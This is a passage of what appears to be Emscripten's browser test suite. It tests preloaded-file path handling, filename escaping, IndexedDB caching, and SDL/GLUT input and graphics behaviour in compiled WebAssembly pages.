create_file('.somefile.txt', 'load me right before running the code please')
create_file('some@file.txt', 'load me right before running the code please')
absolute_src_path = os.path.abspath('somefile.txt')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
# TODO: change this when wasmfs supports relative paths.
if self.get_setting('WASMFS'):
path = "/" + path
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath])
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
create_file(tricky_filename, 'load me right before running the code please')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.btest_exit('main.cpp', args=['--preload-file', tricky_filename.replace('@', '@@')])
# TODO: WASMFS doesn't support the rest of this test yet. Exit early.
if self.get_setting('WASMFS'):
return
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.btest_exit('main.cpp', args=['--preload-file', absolute_src_path])
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <assert.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
f = fopen("%s", "r");
assert(f != NULL);
fclose(f);
f = fopen("%s", "r");
assert(f == NULL);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath, '--exclude-file', '*/.*'])
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'], reporting=Reporting.JS_ONLY)
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?exit:0')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.btest_exit('main.cpp', args=['--pre-js', 'pre.js', '--use-preload-plugins'])
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
@parameterized({
'default': ([],),
'pthreads': (['-pthread', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME'],),
})
@requires_threads
def test_preload_file_with_manual_data_download(self, args):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'] + args)
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
# Move .data file out of server root to ensure that getPreloadedPackage is actually used
os.mkdir('test')
shutil.move('manual_download_data.data', 'test/manual_download_data.data')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by
# correctly escaping the names.
def test_output_file_escaping(self):
self.set_setting('EXIT_RUNTIME')
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.abspath(d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
create_file(os.path.join(d, txt), 'load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
create_file(cpp, r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
abs_txt = os.path.join(abs_d, txt)
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.abspath(page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser(page_file, '|load me right before|.', '/report_result?exit:0')
@parameterized({
'0': (0,),
'1mb': (1 * 1024 * 1024,),
'100mb': (100 * 1024 * 1024,),
'150mb': (150 * 1024 * 1024,),
})
def test_preload_caching(self, extra_size):
self.set_setting('EXIT_RUNTIME')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
if is_chrome() and extra_size >= 100 * 1024 * 1024:
self.skipTest('chrome bug')
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.c', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-sALLOW_MEMORY_GROWTH'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_preload_caching_indexeddb_name(self):
self.set_setting('EXIT_RUNTIME')
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.c', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_multifile(self):
# a few files inside a directory
ensure_dir('subdirr/moar')
create_file('subdirr/data1.txt', '1214141516171819')
create_file('subdirr/moar/data2.txt', '3.14159265358979')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
assert(strcmp("3.14159265358979", buf) == 0);
return 0;
}
''')
# by individual files
self.btest_exit('main.c', args=['--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt'])
# by directory, and remove files to make sure
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--preload-file', 'subdirr', '-o', 'page.html'], reporting=Reporting.JS_ONLY)
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?exit:0')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(Path('subdirr/data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
default_shell = read_file(path_from_root('src/shell.html'))
create_file('shell.html', default_shell.replace('var Module = {', '''
var Module = {
locateFile: function(path, prefix) {
if (path.endsWith(".wasm")) {
return prefix + path;
} else {
return "cdn/" + path;
}
},
'''))
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
return 0;
}
''')
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.data', Path('cdn/test.data'))
self.run_browser('test.html', '', '/report_result?exit:0')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.disableErrorReporting = true;
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
@also_with_wasmfs
def test_dev_random(self):
self.btest_exit(Path('filesystem/dev_random.cpp'))
def test_sdl_swsurface(self):
self.btest_exit('sdl_swsurface.c', args=['-lSDL', '-lGL'])
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.btest_exit(src, args=[
'-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
@also_with_wasmfs
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.btest_exit(src, args=[
'-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
@parameterized({
'': ([],),
# add testing for closure on preloaded files + ENVIRONMENT=web (we must not
# emit any node.js code here, see
# https://github.com/emscripten-core/emscripten/issues/14486
'closure_webonly': (['--closure', '1', '-sENVIRONMENT=web'],)
})
def test_sdl_image_prepare_data(self, args):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'] + args, manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest_exit('sdl_stb_image_cleanup.c', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O0', '-sSAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O2', '-sSAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-sGL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-sASSERTIONS', '-sSAFE_HEAP', '-sASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest_exit('canvas_focus.c')
def test_keydown_preventdefault_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-sEXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest_exit('glut_touchevents.c', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest_exit('glut_wheelevents.c', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
